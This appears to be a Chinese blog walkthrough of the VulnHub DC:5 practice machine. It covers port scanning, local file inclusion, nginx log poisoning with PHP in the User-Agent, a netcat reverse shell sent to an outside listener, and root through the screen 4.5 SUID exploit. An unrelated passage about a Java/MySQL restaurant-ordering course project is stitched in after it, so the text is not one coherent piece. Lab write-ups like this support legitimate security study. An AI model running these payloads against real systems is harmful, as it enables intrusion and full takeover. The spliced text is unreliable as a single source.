VulnHub DC:5

本文档详细介绍了针对VulnHub靶机DC:5的安全分析过程,包括使用nmap进行端口扫描,发现80端口上的nginx web服务。通过爆破目录,利用本地文件包含(LFI)漏洞,并尝试通过修改nginx日志文件执行代码。文章还展示了如何利用用户代理字符串注入PHP代码,以及通过提权脚本获得root权限的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机192.168.1.226

nmap起手。

 nmap -sT 192.168.1.226 -p-  -sV -sC -O

在这里插入图片描述
可以看到80端口用了nginx的web服务。
在这里插入图片描述
信息很少也就contact页面下有个输入框。这里可以猜测sql注入,和xss。漏洞,还有注意的是,这些页面都是PHP文件。参数变得尤其重要。

爆破目录

https://github.com/OJ/gobuster

gobuster -m dir -u 192.168.1.226 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

在这里插入图片描述
访问一下thankyou.php
在这里插入图片描述
似乎没什么可疑的地方,但实际上每次访问,底部的2018都换改变。这很奇怪。
在这里插入图片描述
可以看看footer.php。
在这里插入图片描述
很明显这里用了include(’’)函数。尝试能不能用file参数传进目录文件。也就是local file inclusion (LFI)本地文件包含漏洞。

http://192.168.1.226/thankyou.php?file=/etc/passwd

在这里插入图片描述

文件包含漏洞。

?file=/filepath不是唯一一种方式。我们也可以通过 wfuzz这样的工具去猜测可能性。
我们从nmap扫描中看到该web服务器时nginx,我们可以尝试去毒害 PHP文件从而执行代码.nginx的日志文件可以令thankyou.php执行代码。
访问?file=/etc/nginx/nginx.conf可以知道配置的访问log 文件在哪里。
在这里插入图片描述

这里有个问题。访问access.log,内容太多了,刚刚用nmap,gobuster的访问记录都在里面。为了看清里面的访问内容我不得不重置我的虚拟机。
在这里插入图片描述
这里需要通过用户代理字符串中发送PHP代码来实现。可以用burpsuite ,我这里选择用curl.

curl -A "<?= shell_exec('id');?>" http://192.168.1.226/thankyou.php

在这里插入图片描述
用nc反弹shell

nc -lvp 7777
curl -A "<?= shell_exec('nc 192.168.1.127 7777 -e /bin/bash');?>" http://192.168.1.226/thankyou.php

在这里插入图片描述
python 升级shell

python -c "import pty;pty.spawn('/bin/bash')"
^Z
stty raw -echo
fg

先用运行python代码,然后CTRL+z,后台运行,stty 后fg就能得到一个可以用ctrl-c,tab,向上的shell

提权。

利用提权检查脚本。

git clone https://github.com/sleventyeleven/linuxprivchecker

启动apache2
systemctl start apache2
在这里插入图片描述
把脚本传到web目录下。
cd到tmp目录下,然后下载

在这里插入图片描述

chmod +x linuxprivchecker.py 
./linuxprivchecker.py > 1.txt

运行
在这里插入图片描述
多了一个screens文件在这里插入图片描述
这里中这个screen可以进行suid提权。

searchsploit screen|grep 4.5

在这里插入图片描述
该脚本似乎并没有遵循应有的EOF标记。
此漏洞利用程序分为三个主要阶段。两个编译步骤和最后一个利用步骤。
我们可以将他拆分。这里需要注意的是脚本中的路径问题。

在这里插入图片描述

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

完成编译后,应该具有libhax.so,rootshell和script.sh。
把这三个文件传到dc5。
在这里插入图片描述

chmod +x script.sh
chmod +x rootshell
./script.sh

在这里插入图片描述
okok,去root目录下拿到最后的flag
在这里插入图片描述

《餐馆点餐管理系统——基于Java和MySQL的课程设计解析》 在信息技术日益发达的今天,餐饮行业的数字化管理已经成为一种趋势。本次课程设计的主题是“餐馆点餐管理系统”,它结合了编程语言Java和数据库管理系统MySQL,旨在帮助初学者理解如何构建一个实际的、具有基本功能的餐饮管理软件。下面,我们将深入探讨这个系统的实现细节及其所涉及的关键知识点。 我们要关注的是数据库设计。在“res_db.sql”文件中,我们可以看到数据库的结构,可能包括菜品表、订单表、顾客信息表等。在MySQL中,我们需要创建这些表格并定义相应的字段,如菜品ID、名称、价格、库存等。此外,还要设置主键、外键来保证数据的一致性和完整性。例如,菜品ID作为主键,确保每个菜品的唯一性;订单表中的顾客ID和菜品ID则作为外键,与顾客信息表和菜品表关联,形成数据间的联系。 接下来,我们来看Java部分。在这个系统中,Java主要负责前端界面的展示和后端逻辑的处理。使用Java Swing或JavaFX库可以创建用户友好的图形用户界面(GUI),让顾客能够方便地浏览菜单、下单。同时,Java还负责与MySQL数据库进行交互,通过JDBC(Java Database Connectivity)API实现数据的增删查改操作。在程序中,我们需要编写SQL语句,比如INSERT用于添加新的菜品信息,SELECT用于查询所有菜品,UPDATE用于更新菜品的价格,DELETE用于删除不再提供的菜品。 在系统设计中,我们还需要考虑一些关键功能的实现。例如,“新增菜品和价格”的功能,需要用户输入菜品信息,然后通过Java程序将这些信息存储到数据库中。在显示所有菜品的功能上,程序需要从数据库获取所有菜品数据,然后在界面上动态生成列表或者表格展示。同时,为了提高用户体验,可能还需要实现搜索和排序功能,允许用户根据菜品名称或价格进行筛选。 另外,安全性也是系统设计的重要一环。在连接数据库时,要避免SQL注入攻击,可以通过预编译的PreparedStatement对象来执行SQL命令。对于用户输入的数据,需要进行验证和过滤,防止非法字符和异常值。 这个“餐馆点餐管理系统”项目涵盖了Java编程、数据库设计与管理、用户界面设计等多个方面,是一个很好的学习实践平台。通过这个项目,初学者不仅可以提升编程技能,还能对数据库管理和软件工程有更深入的理解。在实际开发过程中,还会遇到调试、测试、优化等挑战,这些都是成长为专业开发者不可或缺的经验积累
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值